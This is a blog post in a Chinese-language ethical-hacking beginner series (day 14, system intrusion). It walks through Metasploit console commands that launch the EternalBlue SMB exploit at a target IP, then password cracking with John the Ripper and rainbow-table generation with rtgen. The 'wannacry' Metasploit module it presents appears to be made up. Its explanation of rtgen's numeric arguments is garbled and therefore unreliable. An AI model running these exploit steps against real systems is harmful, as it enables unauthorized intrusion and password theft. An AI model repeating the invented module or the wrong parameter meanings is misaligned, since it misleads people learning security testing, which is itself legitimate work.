iT邦幫忙

2023 iThome 鐵人賽

DAY 14
0
Security

道德駭客新手入門系列 第 14

Day14 系統入侵

  • 分享至 

  • xImage
  •  

Metasploit

Metasploit 是系統入侵的重要工具。它是一個開源的漏洞利用框架,包含了大量已知漏洞的利用模組。Metasploit 可以用來進行系統入侵的各個階段,包括漏洞掃描、漏洞利用、後滲透操作等。

Metasploit 的優點包括:

  • 功能強大:Metasploit 包含了大量漏洞利用模組,可以用來攻擊各種系統和應用程序。
  • 易用性:Metasploit 的使用界面簡單易懂,即使是初學者也可以快速上手。
  • 可擴展性:Metasploit 是一個開源的框架,可以根據需要進行擴展。

Metasploit 通常被用於以下情況:

  • 進行安全測試:Metasploit 可以用來檢測系統中的漏洞,以便進行修補。
  • 進行滲透測試:Metasploit 可以用來模擬攻擊,以評估系統的安全性。
  • 進行攻擊:Metasploit 可以用來進行惡意攻擊,以竊取數據或破壞系統。

永恆之藍

# 啟動 Metasploit
msfconsole

# 搜索 EternalBlue 模塊
msf6> search eternalblue

# 選擇要使用的模塊
msf6> use exploit/windows/smb/ms17_010_eternalblue

# 配置模塊選項
msf6> set RHOST 192.168.1.100

# 運行模塊
msf6> exploit

想哭

# 啟動 Metasploit
msfconsole

# 搜索想哭病毒模塊
msf6> search wannacry

# 選擇要使用的模塊
msf6> use exploit/windows/smb/wannacry

# 配置模塊選項
msf6> set RHOST 192.168.1.100

# 運行模塊
msf6> exploit

Exploit-DB

搜索 www.exploit-db.com 以查找與漏洞相關的漏洞利用。例如,我們正在使用 Eternal Blue 漏洞利用,我們知道它在 Metasploit 中具有模塊。我們可以搜索 www.exploit-db.com 以查找與 Eternal Blue 漏洞相關的模塊。

破解密碼工具 John the Ripper

John the Ripper 可以用三種不同的模式來破解密碼:字典模式、遞增模式和混合模式。

字典模式 是最簡單的模式,John 會將字典中的每個單詞與密碼哈希值進行比較。此模式對弱密碼有效,但無法破解不在字典中的密碼。

遞增模式 是最徹底的模式,John 會嘗試所有可能的字符組合,直到找到匹配項。此模式對強密碼有效,但可能需要很長時間才能完成,尤其是對於長密碼。

混合模式 是字典模式和遞增模式的組合。John 首先會將字典中的單詞與密碼哈希值進行比較。如果沒有找到匹配項,它就會嘗試遞增模式。混合模式是速度和效果之間的一種折衷。

john passwords.txt

破解密碼時使用 John the Ripper 的技巧

  • 使用大型字典。字典越大,破解密碼的機會就越大。
  • 使用多種字典。有許多不同類型的字典可用,例如常用密碼字典、字典字典和泄露密碼字典。
  • 使用混淆規則。混淆規則可用於生成單詞的變體,這可以幫助您破解不在字典中的密碼。
  • 要有耐心。破解密碼可能需要很長時間,尤其是對於強密碼。

彩虹表

彩虹表(Rainbow Tables)是一種用於提前計算密碼雜湊的方法,以便在破解密碼時節省時間和計算資源。對每個密碼使用John the Ripper等工具進行測試時,都需要計算相應的雜湊值以進行比對,這需要時間和計算能力。在當今的處理器下,這個時間和計算能力可能不是一個大問題,但它們會累積。對於數百萬個單詞而言,每個單詞的微秒數都會增加時間。因此,更容易的方法是在運行檢查之前預先計算這些雜湊。這樣,您只需要在索引中查找雜湊並檢索用於創建該雜湊的純文本。所有耗時的工作都在您需要破解密碼之前完成。當然,這也存在一個權衡。預先計算雜湊意味著您需要在某處存儲它們,而這些預先計算的雜湊就是彩虹表。

彩虹表不僅僅是一個將雜湊和密碼之間的映射,它們以鏈的形式存儲,以限制存儲的純文本密碼數量。在某些情況下,如果純文本密碼未直接存儲,則可以通過推斷來獲得它。有許多工具可以用來從這些表中查找密碼,但首先我們需要這些表。

Rainbow Crack項目提供了一個查找密碼的工具,以及一個創建彩虹表的工具。這個創建工具不是用於從單詞列表生成雜湊的,而是將根據提供的約束條件生成所有可能的密碼值的雜湊。在下面的代碼中,您將看到使用**rtgen**生成彩虹表的示例。

rtgen md5 loweralpha-numeric 5 8 0 3800

這個命令 rtgen md5 loweralpha-numeric 5 8 0 3800 用於生成一個MD5哈希彩虹表

  • rtgen 是用於生成彩虹表的工具。
  • md5 表示要生成的彩虹表將使用MD5哈希算法進行計算。
  • loweralpha-numeric 是字符集,它指定了用於生成密碼的字符集。在這個字符集中包括小寫字母(a-z)和數字(0-9)。這表示生成的密碼將由小寫字母和數字組成。
  • 5 是彩虹表中每個密碼的最小長度。在這種情況下,密碼的最小長度為5個字符。
  • 8 是彩虹表中每個密碼的最大長度。在這種情況下,密碼的最大長度為8個字符。
  • 0 是種子(seed),通常用於確保生成的彩虹表是唯一的。在這個示例中,種子設置為0,表示不使用特定的種子。
  • 3800 是要生成的彩虹表的鏈(chain)數量。彩虹表的性能和大小與鏈的數量有關,更多的鏈意味著更大的彩虹表,但也需要更多的存儲空間。在這個示例中,生成的彩虹表將包含3800條鏈。

上一篇
Day 13 弱點分析 2
下一篇
Day15 系統入侵 2
系列文
道德駭客新手入門30
圖片
  直播研討會
圖片
{{ item.channelVendor }} {{ item.webinarstarted }} |
{{ formatDate(item.duration) }}
直播中

尚未有邦友留言

立即登入留言